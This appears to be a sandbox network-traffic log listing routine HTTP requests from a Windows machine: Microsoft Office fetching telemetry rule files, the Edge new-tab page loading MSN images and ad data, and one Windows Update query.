Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1lFz6G.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1hk7Sh.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1u24yb.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=0&locale=en-us&country=US&muid=076D87ACE96D60880BB292ECE84461D8&ACHANNEL=4&ABUILD=117.0.5938.150&clr=esdk&edgeid=5518710994624701133&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&ISSIGNEDIN=0&MSN_CANVAS=2&ISMOBILE=0&BROWSER=6&placement=88000308\|10837393&bcnt=1\|1&asid=0f2b81d35b21498bb7cefbe059bdc675 HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=076D87ACE96D60880BB292ECE84461D8; _EDGE_S=F=1&SID=362A82EB85AA6E9C174A97AB845F6F4F; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=076D87ACE96D60880BB292ECE84461D8&bcnt=1&placement=88000244&ACHANNEL=4&ABUILD=117.0.5938.150&clr=esdk&edgeid=5518710994624701133&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&asid=ed7039153ef64b578c0b1982c04b9aec HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=076D87ACE96D60880BB292ECE84461D8; _EDGE_S=F=1&SID=362A82EB85AA6E9C174A97AB845F6F4F; _EDGE_V=1; _C_ETH=1; msnup=
Source: global traffic	HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1msG0W.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1msBaE.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1msOOW.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule90401v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=UwR+YbHaZNrmG2l&MD=KeOoTvEV HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
